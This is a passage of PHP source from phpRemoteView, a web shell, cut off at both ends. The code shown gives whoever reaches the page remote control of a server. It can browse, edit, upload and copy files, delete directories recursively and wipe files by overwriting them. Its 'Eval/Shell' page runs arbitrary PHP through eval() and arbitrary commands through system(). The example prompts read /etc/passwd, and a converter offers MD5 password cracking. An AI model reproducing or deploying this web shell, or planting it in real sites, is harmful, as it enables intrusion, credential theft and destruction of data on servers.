echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr><<<<b>".mm("back to directory")."</b> >>></nobr></a>";
echo "<p>";
//up_link($d,"");
if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
echo "<tr class=tr><td> ".mm("Owner")."/".mm("Group")." </td><td>";
$tmp=@_posix_getpwuid(fileowner($d.$f));
if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
else echo $tmp['name']." ";
$tmp=@_posix_getgrgid(filegroup($d.$f));
if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
else echo $tmp['name'];
echo "</td></tr><tr class=tr><td>";
echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
echo "</tD><form action=$self method=get><td width=70> </td><td>
<input type=hidden name=c value=\"tree\">
Root <input type=text name=d value=\"$d\"><br>
<input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
<input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
<input type=submit value='Show TREE directory'>";
echo "</td></form></tr></table><P>";
if (!$write_access) exitw();
echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
echo "
<table border=0 cellspacing=0 cellpadding=0><tr>
<td><form action=$self method=post>
<input type=hidden name=c value=dirdelete>
<input type=hidden name=c2 value=files>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=ref value=\"$url\">
<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>></small><input type=checkbox name=confirm value=delete></nobr>
</td><td></form></td><td> </td>
<td><form action=$self method=post>
<input type=hidden name=c value=dirdelete>
<input type=hidden name=c2 value=dir>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=ref value=\"$url\">
<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>></small><input type=checkbox name=confirm value=delete></nobr>
</td><td></form></td><td> </td>
</tr></table>
";
echo "
<form action=$self method=post>
<b>".mm("MAKE DIR")."</b> (type full path)
<input type=hidden name=c value=newdir_submit>
<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
<input type=submit value='".mm("MkDir")."'>
</form>";
echo "
<form action=$self method=post>
<b>".mm("CREATE NEW FILE or override old file")."</b><br>
<input type=hidden name=c value=newfile_submit>
".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
<input type=submit value='".mm("CREATE/OVERRIDE")."'>
<input type=checkbox name=confirm value=1 id=conf1><label for=conf1><=confirm</label><br>
<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
</form>";
echo "
<form enctype='multipart/form-data' action='$self' method=post>
<input type=hidden name=c value=fileupload_submit>
<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
<input type=hidden name='MAX_FILE_SIZE' value=999000000>
1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
2. ".mm("save this file on path").":
<input name=df size=50 value=\"".realpath($d)."/\"><br>
3. <input type=checkbox name=df2 value=1 id=df2 checked>
<label for=df2>".mm("create file name automatic")."</label>
".mm("OR")."
".mm("type any file name").":
<input name=df3 size=20><br>
4. <input type=checkbox name=df4 value=1 id=df4>
<label for=df4>".mm("convert file name to lovercase")."</label><br>
<input type=submit value='".mm("Send File")."'>
</form>";
break;
case "tree":
$tcolors=array(
'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
function dir_tree($df,$level=0) {
global $tcolors,$self;
$df=str_replace("//","/",$df);
$dirs=array();
$files=array();
if ($dir=opendir($df)) {
while (($file=readdir($dir))!==false) {
if ($file=="." || $file=="..") continue;
if (is_dir("$df/$file")) {
$dirs[]=$file;
}
else {
$files[]=$file;
}
}
}
closedir($dir);
sort($dirs);
sort($files);
$i=min($level,count($tcolors)-1);
$c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
echo "\r\n\r\n\r\n
<table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
<table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
<tr><td colspan=3 class=dir>".
"<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
$df."</a></td></tr>";
if (count($dirs) || count($files)) {
echo "<tr><td width=15> </td><td class=all width=97%>";
for ($i=0; $i<count($files); $i++) {
echo $files[$i]." ";
}
for ($i=0; $i<count($dirs); $i++) {
dir_tree($df."/".$dirs[$i],$level+1);
}
echo "</td><td width=10> </td></tr>";
}
echo '</table></td></tr></table>';
}
echo "
<STYLE>
.all {
font-family: Verdana;
font-size: 80%;
}
.dir {
font-family: Verdana;
font-size: 95%;
background: #666699;
font-weight: bold;
color: white
}
</STYLE>";
echo $GLOBALS['html'];
up($d,"","Directory");
echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr><<<<b>".mm("back to directory")."</b> >>></nobr></a>";
echo "<p>";
dir_tree($d);
break;
case "delete":
if (!$write_access) exitw();
if (!isset($c2)) exit("err# delete 1");
if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr><<<<b>".mm("back to directory")."</b> >>></nobr></a><p>";
if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f))
exit("".mm("Delete cancel - File not found")."");
if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
<a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
<a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
switch ($c2) {
case "delete":
//exit("$d $f");
ob();
if (!unlink($d.$f))
obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb");
Header("Location: $self?c=l&d=".urlencode($d));
echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
echo "".mm("Delete ok")."";
break;
case "touch":
ob();
if (!touch($d.$f))
obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb");
Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
echo "".mm("Touch ok (set current time to 'modify time')")."";
break;
case "clean":
ob();
$fi=fopen($d.$f,"w+") or
obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb");
ftruncate($fi,0);
fclose($fi);
Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
echo "".mm("Clean ok (file now empty)")."";
break;
case "wipe":
$size=filesize($d.$f);
ob();
$fi=fopen($d.$f,"w+") or
obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
$str=md5("phpspbru".mt_rand(0,999999999).time());
for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
fclose($fi);
ob();
if (!unlink($d.$f))
obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb");
Header("Location: $self?c=l&d=".urlencode($d));
echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
echo "".mm("Wipe ok (file deleted)")."";
break;
}
//Header("Location: $self?c=l&d=".urlencode(dirname($df)));
//echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
break;
case "dirdelete":
if (!$write_access) exitw();
function dir_delete($df) {
echo "<b>".basename($df)."</b><ul>";
if ($dir=opendir($df)) {
$i=0;
while (($file=readdir($dir))!==false) {
if ($file=="." || $file=="..") continue;
if (is_dir("$df/$file")) {
dir_delete($df."/".$file);
}
else {
echo "$file<br>";
echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
unlink($df."/".$file);
}
$i++;
}
//if ($i==0) echo "-empty-<br>";
}
closedir($dir);
echo "</ul>";
echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
rmdir("$df/$file");
}
if (!isset($c2)) exit("error dirdelete 1");
if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
$df="$d";
switch ($c2) {
case "files":
echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
if ($dir=opendir($df)) {
while (($file=readdir($dir))!==false) {
if ($file=="." || $file=="..") continue;
if (is_dir($df.$file)) {
echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
}
elseif (is_file($df.$file)) {
echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
unlink($df.$file);
echo "<br>";
}
else {
echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
}
}
}
closedir($dir);
$ref="$self?c=l&d=".urlencode($d);
break;
case "dir":
echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
dir_delete($df);
$ref="$self?c=l&d=".urlencode(realpath($d."/.."));
break;
}
//header("Location: $ref");
echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
break;
case "copy":
if (!$write_access) exitw();
if (!isset($from) || !@file_exists($from) || !@realpath($from))
exit("err# copy 1, file [$from] not found");
if (!isset($to) || strlen($to)==0)
exit("err# copy 2, file [$to] not found");
echo "Copy: ....<hr size=1 noshade>";
if (!copy($from,$to)) {
echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
}
else
echo "".mm("DONE")."!<p>";
echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
break;
case "e": // edit
if (!$write_access) exitw();
if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
echo $GLOBALS['html'];
up($d,$f);
echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr><<<<b>".mm("back to directory")."</b> >>></nobr></a>";
up_link($d,$f);
$msg="";
if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
else fclose($fi);
if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
else fclose($fi);
if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
echo "<form action=$self method=post>
<input type=hidden name=c value=e_submit>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
<textarea name=text cols=70 rows=20 style='width: 100%;'>".
htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
<input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
<input type=checkbox name=confirm value=1 id=conf>
<label for=conf><font color=red><b><= confirm</b></font></label>
</form>";
break;
case "e_submit":
if (!$write_access) exitw();
if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
if (!isset($text)) exit("err# e_submit 1");
if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
fwrite($fi,$text);
fclose($fi);
Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
break;
case "newfile_submit":
if (!$write_access) exitw();
if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
fwrite($fi,$text);
fclose($fi);
Header("Location: $self?c=l&d=".urlencode(dirname($df)));
echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
break;
case "fileupload_submit":
if (!$write_access) exitw();
if (!isset($df)) exit("err# newfile_submit 1");
if (!isset($df3)) exit("err# newfile_submit 2");
$fname="";
if (isset($df2)) {
if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
exit("Upload failed: can't detect file name");
}
$fname=$ok[1];
}
else {
$fname=$df3;
}
if ($fname=="")
exit("".mm("You mast checked 'create file name automatic' OR typed file name!")."");
if (isset($df4)) $fname=strtolower($fname);
echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
if ($df[strlen($df)-1]!="/") $df.="/";
echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
ob();
$ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
obb();
if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
Header("Location: $ref");
echo "<a href='$ref'>NEW FILE SAVED</a>";
break;
case "newdir_submit":
if (!$write_access) exitw();
if (!isset($df)) exit("err# newdir_submit 1");
ob();
if (!mkdir($df,$mkdir_mode)) {
obb();
exit("Access denied $obb");
}
obb();
if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
Header("Location: $ref");
echo "<a href='$ref'>Go to new directory!</a>";
break;
case "t":
echo "<h3>
<a href='$self'>START PAGE</a> |
<a href='$self?c=t'>Eval/Shell</a> |
<a href='$self?c=codes'>Character map</a>
</h3>";
if (!$write_access) exitw();
error_reporting(2038);
if (!isset($php)) {
$php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
$skipphp=1;
$pre='checked';
$nlbr='';
$xmp='';
$htmls='checked';
}
echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\" ".mm("and")." \"?>\")
<form action=$self method=post>
<input type=hidden name=c value=t>
<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
<input type=checkbox name=pre value='checked' $pre id='pre'>
<label for='pre'> add <pre></label>
<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
<label for='xmp'> add <xmp></label>
<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
<label for='htmls'> add htmlspecialchars()</label>
<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
<label for='nlbr'> add nl2br()</label><br>
<input type=submit></form>
<P>";
if (!isset($shell)) $skipshell=1;
if (!isset($skipphp)) {
echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
if ($pre<>'') echo "<pre>";
if ($xmp<>'') echo "<xmp>";
if ($nlbr<>'' || $htmls<>'') {
ob_start();
}
if ($phpeval_access) eval($php);
else die("Sorry, function eval() disabled.");
if ($nlbr<>'' || $htmls<>'') {
$tmp=ob_get_contents();
ob_end_clean();
if ($htmls<>'') $tmp=htmlspecialchars($tmp);
if ($nlbr<>'') $tmp=nl2br($tmp);
echo $tmp;
}
if ($xmp<>'') echo "]]>";
if ($pre<>'') echo "";
echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
echo "
";
}
if (!isset($shell)) {
$shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
$skipshell=1;
}
echo "".mm("Shell commands")."
";
if (!isset($skipshell)) {
echo "
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<![CDATA[";
if ($system_access) system($shell);
else die("Sorry, function system() disabled.");
echo "]]>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
";
}
$ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)
",
2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
5=>"Decode Base64
",
6=>"UnixTime=>Date(".time().")",
8=>"MKtime: YYYY MM DD [hh [mm [ss]]]
",
9=>"Translit=>RusText", 14=>"RusText=>Translit
",
10=>"cp1251=>koi8r",11=>"koi8r=>cp1251",12=>"cp1251=>mac",13=>"mac=>cp1251",
15=>"koi8r=>mac",16=>"mac=>koi8r",
);
echo "".mm("Universal convert")."";
echo "